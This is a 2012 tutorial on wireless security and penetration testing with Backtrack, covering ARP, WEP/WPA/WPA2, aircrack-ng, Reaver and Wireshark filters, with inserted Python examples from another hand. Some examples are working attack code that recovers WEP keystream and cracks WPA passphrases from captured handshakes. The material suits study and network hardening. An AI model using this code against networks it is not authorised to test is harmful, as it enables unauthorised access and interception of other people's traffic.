
Page 1: Security by Nuno Freitas (WIRELESS)

WIRELESS SECURITY AND PENTEST TUTORIAL USING BACKTRACK

A tutorial about network security and penetration testing using Backtrack that covers networking basics, wireless network basics, wireless penetration and securing wireless networks.

Independent Study
by Nuno Freitas
27/05/2012


Table of Contents

Executive Summary
Before the Fun Part Starts
ARP Protocol
Discovery of Networks
Wireless Networks
Software
Wireshark
Wireless Deauthentication Attack
Fake Authentication
MAC Filtering
Cracking WEP with a connected client (Open System)
Cracking WEP without a connected client (Open System)
Cracking WEP (Shared Key Authentication)
Cracking WPA (Dictionary Mode)
Cracking WPA (Database Mode)
Hidden ESSID
Cracking WPA (Wi-Fi Protected Setup)


Executive Summary

Over the past months I've been learning about network security. I started by reading documents like this one, so I'm writing this tutorial not to teach anyone how to break into their neighbor's network and get free internet or valuable information. I'm writing it because, even though I'm not an expert, I hope it can be useful to those who don't know where to begin.

Backtrack, currently in its fifth version, Backtrack 5, is an operating system based on the Ubuntu GNU/Linux distribution and aimed at digital forensics and penetration testing. It is named after backtracking, a search algorithm.

Backtrack ships with a large number of tools. I'll be talking about some that already come with Backtrack and some others that you need to install if you are using a version older than Backtrack 5 R2; this document also explains how to install those programs.

Throughout the document, imagine I'm an attacker going after wireless networks.

In this tutorial I'll be using one computer running Windows 7 with VMware, and Backtrack 5 R2 installed in a virtual machine as the attacker's system.

I will use two routers through the tutorials because my old router (Conceptronic C54BRS4) doesn't support WPS, which I need for the Reaver attack, so for that part I'll use a TP-LINK TL-WR841ND.

Don't forget: the attacker PC must use a wireless card that supports packet injection in order to perform some of the attacks.


My Setup

- Router: Conceptronic C54BRS4
- Attacker antenna: TP-LINK TL-WN722N
- Router: TP-LINK TL-WR841ND

Before the Fun Part Starts

Before we start the fun part I would like to go over some network basics, so that this paper is helpful even if you don't have a good idea of what a network is and how it works. Even if you already know how a network works, you might still find the text below interesting.


The ARP Protocol

Networks use a variety of protocols. One of them is ARP, the Address Resolution Protocol.

Before we get to ARP, let's recall what physical addresses and logical addresses are.

Physical addresses - what we know as the MAC (Media Access Control) address, which is tied to a network interface. It is 48 bits long (12 hexadecimal digits, usually written as six pairs such as 00:11:22:33:44:55).

Logical addresses - what we usually call IP addresses.

How does ARP work?

When a computer on a local network wants to reach another one it has to know the other computer's IP address, but the frame it actually puts on the wire is addressed to the destination's MAC address, not its IP.

So when you only know the IP you need to ask for the MAC. That is what ARP does: it resolves IP addresses into MAC addresses.

For example, imagine a computer, Computer A, with IP 192.168.2.105 that wants to communicate with Computer B, with IP 192.168.2.100.


Computer A checks its ARP table and, if it has no entry for Computer B's MAC address, sends a frame to the broadcast address FF:FF:FF:FF:FF:FF asking "who has 192.168.2.100?" (the ARP request).

Computer B answers directly to Computer A with its physical address (the ARP reply), and Computer A adds an entry to its ARP table mapping Computer B's IP to that MAC address.

You can check your ARP table by typing in a command prompt:

#arp -a

ARP has no authentication: a host accepts a reply from anyone who sends one, which is what the ARP-based attacks later in this tutorial rely on.

Translating a MAC address back into an IP address is the job of a different protocol, RARP (Reverse Address Resolution Protocol), which is now largely obsolete.

These are some of the most important protocols in networking and some of the easiest to understand. Further on in this tutorial we will talk more about ARP.
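The request/reply exchange just described, as an added example that is not part of the original tutorial: it builds the raw Ethernet/ARP frames Computer A and Computer B would exchange, parses them back and keeps a minimal ARP table. The MAC addresses, the `lan` dictionary and the `resolve` helper are made up for the demo; the frame layout follows RFC 826.

```python
"""ARP request/reply exchange, as an added example (not from the tutorial).
Builds the raw Ethernet + ARP frames Computer A (192.168.2.105) and
Computer B (192.168.2.100) would exchange, parses them back and keeps a
minimal ARP table.  MAC addresses are made up; layout follows RFC 826."""
import struct

BROADCAST = "ff:ff:ff:ff:ff:ff"
ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2


def mac_to_bytes(mac):
    return bytes(int(x, 16) for x in mac.split(":"))


def bytes_to_mac(b):
    return ":".join(f"{x:02x}" for x in b)


def ip_to_bytes(ip):
    return bytes(int(x) for x in ip.split("."))


def bytes_to_ip(b):
    return ".".join(str(x) for x in b)


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip):
    """Ethernet II header (14 bytes) followed by a 28-byte ARP payload.
    A request goes to the broadcast MAC; a reply goes straight back."""
    dst = BROADCAST if op == ARP_REQUEST else target_mac
    eth = mac_to_bytes(dst) + mac_to_bytes(sender_mac) + struct.pack("!H", ETHERTYPE_ARP)
    # htype=1 (Ethernet), ptype=0x0800 (IPv4), hlen=6, plen=4, opcode
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)
    arp += mac_to_bytes(sender_mac) + ip_to_bytes(sender_ip)
    arp += mac_to_bytes(target_mac) + ip_to_bytes(target_ip)
    return eth + arp


def parse_arp(frame):
    """Return the ARP fields of an Ethernet frame, or None if it is not
    an IPv4-over-Ethernet ARP packet."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {
        "op": op,
        "sender_mac": bytes_to_mac(frame[22:28]),
        "sender_ip": bytes_to_ip(frame[28:32]),
        "target_mac": bytes_to_mac(frame[32:38]),
        "target_ip": bytes_to_ip(frame[38:42]),
    }


class ArpTable:
    """The cache each host keeps.  Plain ARP has no authentication, so any
    reply (solicited or not) updates the entry for its sender IP; that is
    the property ARP spoofing relies on."""

    def __init__(self):
        self.entries = {}

    def handle(self, frame):
        arp = parse_arp(frame)
        if arp is not None and arp["op"] == ARP_REPLY:
            self.entries[arp["sender_ip"]] = arp["sender_mac"]

    def lookup(self, ip):
        return self.entries.get(ip)


def resolve(requester_mac, requester_ip, target_ip, lan):
    """Simulate the exchange on a LAN given as {ip: mac}: the requester
    broadcasts a request, the owner of target_ip replies, the requester
    caches the answer.  Returns the resolved MAC or None."""
    table = ArpTable()
    request = build_arp(ARP_REQUEST, requester_mac, requester_ip,
                        "00:00:00:00:00:00", target_ip)
    asked_for = parse_arp(request)["target_ip"]       # what every host sees
    owner_mac = lan.get(asked_for)
    if owner_mac is not None:                         # only the owner answers
        reply = build_arp(ARP_REPLY, owner_mac, asked_for, requester_mac, requester_ip)
        table.handle(reply)
    return table.lookup(target_ip)


if __name__ == "__main__":
    lan = {"192.168.2.100": "00:11:22:33:44:55"}      # constructed: Computer B
    print(resolve("66:77:88:99:aa:bb", "192.168.2.105", "192.168.2.100", lan))
```

The `ArpTable.handle` method accepts a reply whether or not a request went out first; that is exactly how most stacks behave, and it is why an attacker on the same LAN can later plant a fake entry with an unsolicited reply.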


Discovery of Wireless Networks

When you want to perform a wireless attack you first need to identify the network you are going after. Sometimes the attacker already knows which network it is; sometimes he doesn't, and it takes more time to figure it out.

I won't talk about how to hack a corporation because the point of this tutorial is not "how to become a criminal or a hacktivist". I just want to show how easily someone can break into your network and get free internet or your data, and help you to avoid that. So I'll give a general idea of scanning rather than everything there is to it.

For the next tutorials we will be scanning the airwaves passively, in monitor mode. In a passive scan you don't send any probes; instead you gather information from the traffic that is already in the air. Figuratively, your computer just sits down, reads the traffic going through the airwaves and interprets it. Note that monitor mode is not the same as promiscuous mode: promiscuous mode only shows you the traffic of the network you are already connected to, while monitor mode hands you raw 802.11 frames from every network on the channel, without being associated to any of them.

To perform a passive scan the wireless card must be in monitor mode.

A card in monitor mode reads every wireless frame it can hear on its current channel and tries to extract data from it. Since all nearby networks share the same band (a handful of overlapping 2.4 GHz channels, in our case), the air is usually full of frames from several different networks. The card picks them up and the software works out which network each one belongs to. This gives much more than only looking at beacons or probe responses, because there is always far more traffic than those two types of frames. Keep in mind that a single radio listens on one channel at a time, so tools like airodump-ng hop between channels unless you pin them to one.

Not all wireless cards support monitor mode; both the chipset and the driver must support it.

In the tutorials I'll be using airmon-ng, a program in the aircrack-ng suite, to put the wireless card in monitor mode.

Before we start the hacking process there are some things you should read about if you're a beginner. What are WEP and WPA? How do they work? What is the 802.11n standard? Let's find out.


Wireless Networks

There are two families of encryption in wireless networks: WEP, which stands for Wired Equivalent Privacy, and WPA, which stands for Wi-Fi Protected Access (with WPA2 as its current revision). Although WPA is far more secure than WEP, both are vulnerable to different types of attacks, as we will see.

WEP (Wired Equivalent Privacy)

WEP is not good protection, though it is better than an open network; it is nowhere near as secure as WPA/WPA2. The big problem is that if an attacker can sniff packets on a WEP network, it is only a matter of time until the key is recovered.

If enough traffic can be captured, the key can be recovered by statistical attacks on the RC4 key schedule (not by brute force) in minutes or even seconds. The effort grows only linearly with key length, so a 104-bit key gives no significant protection over a 40-bit key against a determined attacker. Several freely available programs crack WEP, which is why it must be considered broken; it only makes sense as a last resort over no encryption at all.

WEP supports two forms of authentication: shared key and open system.

In shared key authentication the client requests authentication, the wireless access point sends a challenge text, the client encrypts it with the WEP key and sends it back, and if the result matches, the access point authenticates and associates the client. This exchange actually weakens the network: anyone sniffing it sees a plaintext challenge and its ciphertext, which hands them the keystream for that IV.

In open system authentication any client can associate with the access point. The client is authenticated regardless of whether it has the key and starts receiving packets; it then needs the correct key to read them.

A "128-bit" WEP key is really a 104-bit secret key (26 hexadecimal digits) combined with a 24-bit Initialization Vector (IV); the older "64-bit" variant uses a 40-bit key (10 hex digits) with the same 24-bit IV. Each packet is encrypted with the RC4 stream cipher keyed with IV || secret key, where the IV changes per packet and is transmitted in clear in front of the ciphertext. The receiver rebuilds the same RC4 key from the received IV and its copy of the secret and decrypts. With only 2^24 possible IVs the same keystream is reused sooner or later, which is the root of most WEP attacks.
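To make the IV-plus-key construction concrete, here is an added example (not code from the tutorial or from aircrack-ng) that implements RC4 and the WEP framing described above, then shows the consequence of a reused IV: the first bytes of every encrypted data frame are a predictable LLC/SNAP header, so an attacker who sees one frame recovers keystream that decrypts the start of any other frame sent under the same IV, without ever knowing the key. The key, IV and payloads are constructed for the demo; the 4-byte CRC-32 integrity value that real WEP appends before encryption is left out.

```python
"""WEP framing with RC4, as an added example (not from the tutorial).
Shows the 24-bit IV prepended to a 104-bit key to seed RC4, and why IV
reuse is fatal: keystream = ciphertext XOR known plaintext, and the same
IV means the same keystream.  Key, IV and payloads are constructed; the
CRC-32 ICV of real WEP is omitted."""


def rc4(key):
    """Generator yielding the RC4 keystream for `key` (KSA, then PRGA)."""
    S = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xff
        S[i], S[j] = S[j], S[i]
    i = j = 0
    while True:                                # pseudo-random generation
        i = (i + 1) & 0xff
        j = (j + S[i]) & 0xff
        S[i], S[j] = S[j], S[i]
        yield S[(S[i] + S[j]) & 0xff]


def keystream(key, n):
    ks = rc4(key)
    return bytes(next(ks) for _ in range(n))


def wep_encrypt(secret, iv, plaintext):
    """Return iv || ciphertext.  WEP seeds RC4 with iv || secret, so one
    secret key yields only 2**24 distinct keystreams."""
    assert len(iv) == 3 and len(secret) in (5, 13)     # 40- or 104-bit key
    ks = keystream(iv + secret, len(plaintext))
    return iv + bytes(p ^ k for p, k in zip(plaintext, ks))


def wep_decrypt(secret, packet):
    iv, ct = packet[:3], packet[3:]
    ks = keystream(iv + secret, len(ct))
    return bytes(c ^ k for c, k in zip(ct, ks))


# Every encrypted 802.11 data frame starts with an LLC/SNAP header, so its
# first plaintext bytes are predictable (this is the IPv4 variant).
KNOWN_HEADER = bytes.fromhex("aaaa030000000800")


def recover_keystream(packet, known_prefix=KNOWN_HEADER):
    """Keystream bytes = ciphertext XOR known plaintext; no key needed.
    Returns (iv, keystream_prefix)."""
    iv, ct = packet[:3], packet[3:]
    return iv, bytes(c ^ p for c, p in zip(ct, known_prefix))


def decrypt_with_keystream(packet, iv, ks):
    """Decrypt as much of `packet` as the recovered keystream covers,
    provided it was sent under the same IV; otherwise None."""
    if packet[:3] != iv:
        return None
    return bytes(c ^ k for c, k in zip(packet[3:], ks))


def demo():
    """Two frames under one IV: learn keystream from the first, decrypt
    the start of the second without the key."""
    secret = bytes.fromhex("0123456789abcdef0123456789")   # 104-bit demo key
    iv = bytes.fromhex("0a0b0c")                            # reused IV
    pkt1 = wep_encrypt(secret, iv, KNOWN_HEADER + b"GET / HTTP/1.0\r\n")
    pkt2 = wep_encrypt(secret, iv, KNOWN_HEADER + b"secret payload")
    iv_seen, ks = recover_keystream(pkt1)
    return decrypt_with_keystream(pkt2, iv_seen, ks)


if __name__ == "__main__":
    print(demo().hex())
```

Eight bytes of keystream per IV is enough for the fragmentation and chopchop attacks in aircrack-ng to bootstrap a full keystream, and the statistical attacks (FMS/KoreK/PTW) need nothing more than many IVs and the first keystream byte each.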


WPA (Wi-Fi Protected Access)

Wi-Fi Protected Access (WPA) is a software/firmware improvement over WEP. Regular WLAN equipment that worked with WEP could simply be upgraded, with no new hardware needed. WPA is a trimmed-down version of the 802.11i security standard that the IEEE 802.11 group developed to replace WEP.

The TKIP (Temporal Key Integrity Protocol) encryption algorithm was developed for WPA to fix WEP's worst problems in a way that could be shipped as a firmware upgrade to existing 802.11 devices. The WPA profile also provides optional support for AES-CCMP, the preferred algorithm in 802.11i and WPA2.

WPA Enterprise provides RADIUS-based authentication using 802.1X.

WPA Personal uses a pre-shared key (PSK) derived from an 8 to 63 character passphrase. The PSK may also be entered directly as a 64-character hexadecimal string (256 bits).

Weak passphrases can be broken offline with a dictionary attack by capturing the "four-way handshake" when a client connects to the network or reconnects after being deauthenticated.

WPA Personal is secure when used with a good passphrase or a full 64-character hexadecimal key. You should also disable WPS (Wi-Fi Protected Setup), since a serious vulnerability in its PIN method has been published and is already being exploited.

TKIP

TKIP stands for Temporal Key Integrity Protocol and is pronounced "tee-kip". It is part of the IEEE 802.11i standard. TKIP implements per-packet key mixing, a re-keying mechanism and a message integrity check (MIC); together these close the WEP weaknesses while still running on WEP-era RC4 hardware.

EAP

IEEE 802.1X, which WPA Enterprise builds on, already improved authentication and authorization for access to wired and wireless LANs. On top of it, the Extensible Authentication Protocol (EAP) carries the actual authentication method and relies on a central authentication server, which adds a further level of security. Unfortunately, in 2002 a University of Maryland professor published shortcomings in the early 802.1X design.


802.11i security

The newest and most rigorous security to implement in WLANs today is the 802.11i RSN standard. The full 802.11i standard (marketed as WPA2) does require newer hardware, unlike WPA, so it can mean buying new equipment. The required hardware may support either AES-WRAP (an early 802.11i draft cipher) or the newer and better AES-CCMP.

WPA2

WPA2 is the Wi-Fi Alliance branded version of the final 802.11i standard. The primary enhancement over WPA is that the AES-CCMP algorithm is mandatory. Both WPA and WPA2 support EAP authentication methods using RADIUS servers as well as pre-shared keys (PSK).

CCMP

CCMP stands for Counter Mode with Cipher Block Chaining Message Authentication Code Protocol (CCM mode Protocol). It is the encryption protocol for wireless products that implement the IEEE 802.11i amendment to the original IEEE 802.11 standard. CCMP is a data cryptographic encapsulation mechanism providing confidentiality and integrity, based on the CCM mode of AES. It was created to replace TKIP, the interim protocol in WPA, and WEP, a dated and insecure protocol.

802.11b

802.11b has a maximum raw data rate of 11 Mbit/s and uses the same media access method defined in the original standard. 802.11b products appeared on the market in early 2000, since 802.11b is a direct extension of the modulation technique defined in the original standard. The dramatic increase in throughput of 802.11b (compared to the original standard) along with substantial price reductions led to its rapid acceptance as the definitive wireless LAN technology.

802.11b devices suffer interference from other products operating in the 2.4 GHz band, such as microwave ovens, Bluetooth devices, baby monitors and cordless telephones.


802.11g

In June 2003 a third modulation standard was ratified: 802.11g. It works in the 2.4 GHz band (like 802.11b) but uses the same OFDM-based transmission scheme as 802.11a. It operates at a maximum physical-layer bit rate of 54 Mbit/s exclusive of forward error correction, or about 22 Mbit/s average throughput. 802.11g hardware is fully backwards compatible with 802.11b hardware and is therefore encumbered with legacy issues that reduce its throughput by about 21% compared to 802.11a.

The then-proposed 802.11g standard was rapidly adopted by consumers starting in January 2003, well before ratification, because of the desire for higher data rates and reductions in manufacturing costs. By summer 2003 most dual-band 802.11a/b products had become dual-band/tri-mode, supporting a and b/g in a single adapter card or access point. Making b and g work well together occupied much of the lingering technical process; in an 802.11g network, the activity of an 802.11b participant reduces the data rate of the whole network.

Like 802.11b, 802.11g devices suffer interference from other products operating in the 2.4 GHz band, for example wireless keyboards.

802.11n

802.11n is an amendment that improves on the previous 802.11 standards by adding multiple-input multiple-output (MIMO) antennas. 802.11n operates on both the 2.4 GHz band and the less used 5 GHz band. The IEEE approved the amendment and published it in October 2009. Before final ratification, enterprises were already migrating to 802.11n networks based on the Wi-Fi Alliance's certification of products conforming to a 2007 draft of the 802.11n proposal.


Software

During the next tutorials I'll be using several programs under Backtrack 5, so let's give a brief explanation of what those programs are and what they can be used for.

Aircrack-ng

Aircrack-ng is a network software suite consisting of a detector, packet sniffer, WEP and WPA/WPA2-PSK cracker and analysis tool for 802.11 wireless LANs. It works with any wireless network interface controller whose driver supports raw monitor mode and can sniff 802.11b, 802.11g and 802.11n traffic. The suite runs under Linux and Windows.

Features

The aircrack-ng suite includes:

- aircrack-ng - cracks WEP keys and WPA/WPA2-PSK passphrases (dictionary attack).
- airdecap-ng - decrypts WEP or WPA encrypted capture files with a known key.
- airmon-ng - places wireless cards in monitor mode.
- aireplay-ng - packet injector (Linux, and Windows).
- airodump-ng - packet sniffer: writes air traffic to PCAP or IVS files and shows information about networks.
- airtun-ng - virtual tunnel interface creator.
- airolib-ng - stores and manages ESSID and password lists and precomputed PMKs; increases the keys per second of WPA attacks.
- packetforge-ng - creates encrypted packets for injection.
- airbase-ng - techniques for attacking clients, as opposed to access points.
- airdecloak-ng - removes WEP cloaking from pcap files.
- airdriver-ng - tools for managing wireless drivers.
- tkiptun-ng - WPA/TKIP attack.
- airserv-ng - allows you to access the wireless card from other computers.
- buddy-ng - the helper server for easside-ng, run on a remote computer.
- easside-ng - a tool for communicating with an access point without the WEP key.
- wesside-ng - automatic tool for recovering a WEP key.

Wireshark

Wireshark is a free and open-source packet analyzer.


It is used for network troubleshooting, analysis, software and communications protocol development, and education. Originally named Ethereal, the project was renamed Wireshark in May 2006 due to trademark issues.

Wireshark is very useful because you can analyze every packet individually and understand what is going on in the air, since it dissects every type of 802.11 frame.

Wireshark is cross-platform, using the GTK+ widget toolkit for its user interface and pcap to capture packets; it runs on various Unix-like operating systems including Linux, Mac OS X and BSD, and on Microsoft Windows.

Pyrit

Pyrit allows creating massive databases, pre-computing part of the IEEE 802.11 WPA/WPA2-PSK authentication phase in a space-time trade-off. Exploiting the computational power of many-core and other platforms through ATI-Stream, Nvidia CUDA, OpenCL and VIA Padlock, it is currently by far the most powerful attack against one of the world's most used security protocols.

Pyrit is free software: everyone can inspect, copy or modify it and share derived work under the GNU General Public License v3+. It compiles and executes on a wide variety of platforms including FreeBSD, Mac OS X and Linux as operating system and x86, alpha, arm, hppa, mips, powerpc, s390 and sparc processors. Pyrit is a very good tool, although it's not included in Backtrack 5; in the Pyrit attack tutorial I will also explain how to install it.
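Serving both the WPA Personal description earlier (weak passphrases and the four-way handshake) and this Pyrit section, here is an added example, not code from the tutorial, aircrack-ng or Pyrit, of what a dictionary attack on a captured handshake actually computes, and why precomputing PMKs per ESSID is the space-time trade-off Pyrit and airolib-ng make. The passphrase-to-PMK step, the PTK expansion and the EAPOL MIC are the real 802.11i computations; the handshake itself (BSSID, client MAC, nonces and the EAPOL message-2 bytes) is constructed for the demo, as is the wordlist.

```python
"""WPA/WPA2-Personal passphrase recovery from a captured 4-way handshake,
as an added example (not from the tutorial, aircrack-ng or Pyrit).  The
crypto is the real 802.11i one: PBKDF2-HMAC-SHA1 with the ESSID as salt
to get the PMK, the PRF that expands PMK into PTK, and the EAPOL-Key MIC.
The handshake below is constructed (made-up MACs, nonces and EAPOL bytes)."""
import hashlib
import hmac


def passphrase_to_pmk(passphrase, essid):
    """PMK = PBKDF2(HMAC-SHA1, passphrase, ESSID, 4096 rounds, 32 bytes).
    The only step that depends on the passphrase; deliberately slow."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)


def pmk_to_ptk(pmk, ap_mac, client_mac, anonce, snonce):
    """802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b"".join(hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]),
                            hashlib.sha1).digest() for i in range(4))
    return out[:64]


def eapol_mic(kck, eapol_frame, wpa2=True):
    """MIC over the EAPOL-Key frame with its MIC field zeroed, keyed with
    the KCK (first 16 bytes of the PTK).  WPA2/CCMP: HMAC-SHA1 truncated
    to 128 bits; WPA/TKIP: HMAC-MD5."""
    h = hashlib.sha1 if wpa2 else hashlib.md5
    return hmac.new(kck, eapol_frame, h).digest()[:16]


def check_passphrase(guess, hs):
    """True if `guess` reproduces the MIC seen in the captured handshake."""
    pmk = passphrase_to_pmk(guess, hs["essid"])
    ptk = pmk_to_ptk(pmk, hs["ap_mac"], hs["client_mac"], hs["anonce"], hs["snonce"])
    return eapol_mic(ptk[:16], hs["eapol_zeroed"], hs["wpa2"]) == hs["mic"]


def dictionary_attack(hs, wordlist):
    """aircrack-ng 'dictionary mode': one full PBKDF2 per candidate."""
    return next((w for w in wordlist if check_passphrase(w, hs)), None)


def precompute_pmks(essid, wordlist):
    """airolib-ng / Pyrit 'database mode': pay PBKDF2 once per (ESSID, word)
    and store the PMKs.  The ESSID is the salt, so the table only serves
    networks with that exact name."""
    return {w: passphrase_to_pmk(w, essid) for w in wordlist}


def table_attack(hs, pmk_table):
    """Against a precomputed table only the cheap PRF + MIC step remains."""
    for word, pmk in pmk_table.items():
        ptk = pmk_to_ptk(pmk, hs["ap_mac"], hs["client_mac"], hs["anonce"], hs["snonce"])
        if eapol_mic(ptk[:16], hs["eapol_zeroed"], hs["wpa2"]) == hs["mic"]:
            return word
    return None


def make_handshake(passphrase, essid="IEEE"):
    """Constructed capture: the fields an attacker parses out of message 2
    of the 4-way handshake.  The MIC is computed here with the true
    passphrase, which the attacker does not know."""
    hs = {
        "essid": essid,
        "ap_mac": bytes.fromhex("001122334455"),              # made-up BSSID
        "client_mac": bytes.fromhex("66778899aabb"),          # made-up station
        "anonce": hashlib.sha256(b"anonce-demo").digest(),    # stand-in nonces
        "snonce": hashlib.sha256(b"snonce-demo").digest(),
        # stand-in EAPOL-Key frame bytes with the 16-byte MIC field zeroed
        "eapol_zeroed": bytes.fromhex("0103007502010a00") + bytes(113),
        "wpa2": True,
    }
    pmk = passphrase_to_pmk(passphrase, essid)
    ptk = pmk_to_ptk(pmk, hs["ap_mac"], hs["client_mac"], hs["anonce"], hs["snonce"])
    hs["mic"] = eapol_mic(ptk[:16], hs["eapol_zeroed"], True)
    return hs


if __name__ == "__main__":
    hs = make_handshake("password")
    words = ["letmein", "qwerty123", "password", "dragon"]   # constructed wordlist
    print(dictionary_attack(hs, words))
    print(table_attack(hs, precompute_pmks("IEEE", words)))
```

Two things fall out of this that the prose only states: every candidate costs 4096 HMAC-SHA1 operations before the cheap MIC check, which is why a GPU-accelerated tool like Pyrit matters, and the PMK table is keyed by ESSID, so a table built for "IEEE" is useless against a network called anything else (renaming your network away from a default like "linksys" or "TP-LINK" defeats precomputed tables, though not a direct dictionary attack).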

Reaver

Reaver implements a brute force attack against Wi-Fi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases.

Reaver has been designed to be a robust and practical attack against WPS and has been tested against a wide variety of access points and WPS implementations.

On average Reaver will recover the target AP's plaintext WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice it generally takes half this time to guess the correct WPS PIN and recover the passphrase. The attack is feasible because the AP verifies the 8-digit PIN in two halves, which cuts the search to about 11,000 guesses instead of 10^8.


Wireshark

As you read above, Wireshark is a packet analyzer. Let's learn how to work with it.

Remember that Wireshark can capture on every interface you have. For example you can create a monitor mode interface and select it in Wireshark; that way you will get every frame in the air around you, which is a lot of frames.

As you already saw with airodump-ng from the aircrack-ng suite, it is very easy to collect thousands of frames in minutes or even seconds, depending on the traffic of the network. It would be a chore to find a few data frames in the middle of all the beacon frames, but Wireshark can filter by frame type or by MAC address. With that we can quickly get to the specific frames we are looking for.

First let's talk about WLAN frames; understanding them will help us with Wireshark and with networking in general.

There are three types of frames: management frames, control frames and data frames.

1. Management frames: they are responsible for establishing and maintaining the relationship between access points and wireless clients. The management subtypes you will see most often are:

- Authentication - 802.11 authentication is the process whereby the access point accepts or rejects the identity of a wireless card. The wireless card begins the process by sending an authentication frame containing its identity to the access point. With open system authentication (the default), the wireless card sends only one authentication frame and the access point responds with an authentication frame indicating acceptance (or rejection). With the optional shared key authentication, the wireless card sends an initial authentication frame and the access point responds with an authentication frame containing challenge text. The client must send an encrypted version of the challenge text (using its WEP key) in an authentication frame back to the access point. The access point checks that the client has the correct WEP key (which is the basis for authentication) by verifying that the challenge text recovered after decryption is the same as the one it sent. Based on the result of this comparison, the access point replies to the client with an authentication frame carrying the result.

- Deauthentication - a station sends a deauthentication frame to another station when it wishes to end the authenticated relationship. Since it is a plain management frame it carries no proof of who sent it, which is what the deauthentication attack later in this tutorial exploits.

- Association Request - 802.11 association enables the access point to allocate resources for and synchronize with a wireless card. The client begins the association process by sending an association request to an access point. This frame carries information about the wireless card (supported data rates, etc.) and the SSID of the network it wishes to associate with. After receiving the association request, the access point considers associating with the client and, if accepted, reserves some memory for it and establishes an association ID.

- Association Response - an access point sends an association response frame containing an acceptance or rejection notice to the wireless card requesting association. If the access point accepts the wireless card, the frame includes information about the association, such as the association ID and supported data rates. If the outcome is positive, the client can use the access point to communicate with other clients on the network and with systems on the distribution (i.e., Ethernet) side of the access point.

- Reassociation Request - if a wireless card roams away from its current access point and finds another access point with a stronger beacon signal, it sends a reassociation request frame to the new access point. The new access point then coordinates the forwarding of data frames that may still be buffered at the previous access point waiting for transmission to the wireless card. This applies to several access points serving the same network, not to access points on different networks.

- Reassociation Response - an access point sends a reassociation response frame containing an acceptance or rejection notice to the wireless card requesting reassociation. As in the association process, the frame includes information about the association, such as the association ID and supported data rates.

- Disassociation - a station sends a disassociation frame to another station when it wishes to terminate the association. For example, a wireless card that is shut down gracefully can send a disassociation frame to alert the access point that it is powering off. The access point can then release the memory allocation and remove the wireless card from its association table.

- Beacon - the access point periodically sends a beacon frame to announce its presence and relay information such as the timestamp, SSID and other parameters of the access point to wireless cards within range. Wireless cards continually scan the 802.11 channels and listen to beacons as the basis for choosing which access point to associate with.

- Probe Request - a station sends a probe request frame when it needs to obtain information from another station. For example, a wireless card sends a probe request to find out which access points are within range.

- Probe Response - a station responds with a probe response frame, containing capability information, supported data rates, etc., after it receives a probe request frame.


2. Control frames: control frames are responsible for ensuring a proper exchange of data between the access point and wireless clients. The main control subtypes are:

- Request to Send (RTS)
- Clear to Send (CTS)
- Acknowledgement (ACK) - since 802.11 stations cannot transmit and receive at the same time, a station that is transmitting a frame cannot tell whether the frame was received or whether there was a collision. Therefore an 802.11 radio that receives a unicast frame replies with a 14-octet acknowledgement (ACK) frame.

3. Data frames: data frames carry the actual data sent on the wireless network. They do have subtypes (for instance Null frames with no payload, and QoS Data frames), but for our purposes filtering on the type alone is enough.

Now that the different types of WLAN frames are explained, we can start with Wireshark. The explanation of frames matters because in Wireshark you will get hundreds of frames and you will need to filter them to simplify the process.

So, let's start with Wireshark. To start it, type "wireshark &" in the console.

But before we start sniffing the airwaves let's create a monitor mode interface to capture every frame from every network in range. To do that just type:

#airmon-ng start wlan0

wlan0 depends on your device; it could be wlan0, wlan1, ... depending on how many wireless cards you have connected and which one you want to use.

To see what you have, type:

#airmon-ng

The output will show you how many cards you have and their interface names.

After you put your wireless card in monitor mode you get a new interface named mon0. That new interface is a virtual interface which is nothing more than your wireless card working in monitor mode. That's the interface we will use in Wireshark.

After you start Wireshark you will get this window:


This is the start window of Wireshark. To get started click on "Interface List" under Capture, below the Wireshark logo.

You will get the list of available interfaces you can capture on. mon0 captures the airwaves on whatever channel the card is currently tuned to (a single radio only listens on one channel at a time; set it with "iwconfig mon0 channel N" or let airodump-ng hop), while eth0 or eth1 captures your wired network.


This is Wireshark capturing frames from the air. As you can see there are some ACK frames and some data frames. You will get hundreds or even thousands of frames while sniffing. Imagine that we need to look at data frames only: it would be very hard to find them among all the other frames, because there are several types and you are looking for only one. That's where Wireshark's display filters help a lot.


Wireshark Filters

Filter by destination, source and port

eth.src - source MAC address (Ethernet). Example: eth.src == 00:11:22:33:44:55
eth.dst - destination MAC address (Ethernet). Example: eth.dst == 00:11:22:33:44:55
wlan.addr - source or destination MAC address of an 802.11 frame. Example: wlan.addr == 00:11:22:33:44:55
wlan.sa - source MAC address (802.11). Example: wlan.sa == 00:11:22:33:44:55
wlan.da - destination MAC address (802.11). Example: wlan.da == 00:11:22:33:44:55
wlan.bssid - only the frames of a specific access point, by its BSSID (the AP's MAC address). Example: wlan.bssid == 00:11:22:33:44:55
ip.addr - source or destination IPv4 address. Example: ip.addr == 192.168.2.1
ip.dst - destination IPv4 address. Example: ip.dst == 192.168.2.1
ip.src - source IPv4 address. Example: ip.src == 192.168.2.1
ipv6.addr - source or destination IPv6 address. Example: ipv6.addr == 2001::5
ipv6.src - source IPv6 address. Example: ipv6.src == 2001::5
ipv6.dst - destination IPv6 address. Example: ipv6.dst == 2001::5
tcp.port - source or destination TCP port. Example: tcp.port == 80
tcp.dstport - destination TCP port. Example: tcp.dstport == 80
tcp.srcport - source TCP port. Example: tcp.srcport == 80
udp.port - source or destination UDP port. Example: udp.port == 53
udp.dstport - destination UDP port. Example: udp.dstport == 53
udp.srcport - source UDP port. Example: udp.srcport == 53

